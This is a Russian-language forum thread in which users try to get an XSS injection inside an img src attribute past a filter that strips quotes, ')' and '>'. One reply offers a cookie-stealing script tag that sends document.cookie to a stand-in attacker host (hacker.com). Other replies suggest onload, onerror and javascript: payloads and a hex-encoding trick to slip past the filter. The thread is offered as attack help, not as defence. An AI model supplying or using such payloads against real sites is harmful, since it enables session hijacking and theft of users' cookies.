Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
xss, <img src="galery/==XSS==">
 
Можно ли что-то сделать с багой типа
<img src="galery/==XSS==">
Если фильтруются двойные кавычки (") и обратная скобка ")".
 
двойная кавычка как имено фильтруется?
заменяется на \" или вырезается...или как?
аналогино как фильтруется скобка?
если фильтруется двойная кавычка таким образом \"
то можно сделать вот что
<img src="galery/\"><script>document.location.href='http://hacker.com/c.php?c='+escape(document.cookie)</script> ">
примерно..
 
вырезается
 
тогда вряли ли что то стоящее удасться провернуть..
так как за пределы строкового параметра ты не вылезешь...
 
а можно ли просто сослаться на др сервер? (картинка не с этого сервера)
 
Как вариант:
<image src=1.png onload=alert('ok')>
<image src=javascript:alert('ok')>
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
<image src='' onerror=alert('ok')>
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Цитата
ZzZzZzZ пишет:
а можно ли просто сослаться на др сервер? (картинка не с этого сервера)
Сослаться-то можно, вот только если ты в качестве картинки скрипт укажешь - вряд ли он выполнится!
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Shanker
Цитата
ZzZzZzZ пишет:
обратная скобка ")".
Цитата
Shanker пишет:
Сослаться-то можно
напиши плз
 
и ">" тоже режется.
Цитата
Phoenix пишет:
двойная кавычка как имено фильтруется? заменяется на " или вырезается...или как?
заменяется на \"
 
НЕВОЗМОЖНЫЕ ТЕГИ ")" и ">"
ЗАМЕНЯЮЩИЕСЯ ТЕГИ ", '
 
Цитата
ZzZzZzZ пишет:
обратная скобка ")"
alert('ok') шифруем hex'ом:
%61%6C%65%72%74%28%27%6F%6B%27%29

В итоге попробуй: <image src=1.png onload=%61%6C%65%72%74%28%27%6F%6B%27%29>
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Цитата
ZzZzZzZ пишет:
<img src="galery/==XSS==">
Как же ты это вводишь если ">" фильтруется? Или ты там с bb-кодом развлекаешься?
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
<img src="galery/==XSS==">

==XSS== - это то место куда можно вставить код
 
Цитата
ZzZzZzZ пишет:
<img src="galery/==XSS==">
Случаем создаётся не беря переменную строку из url?
Если нет и нельзя вообще убрать galery/ то никак не обойти...
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
Страницы: 1
Читают тему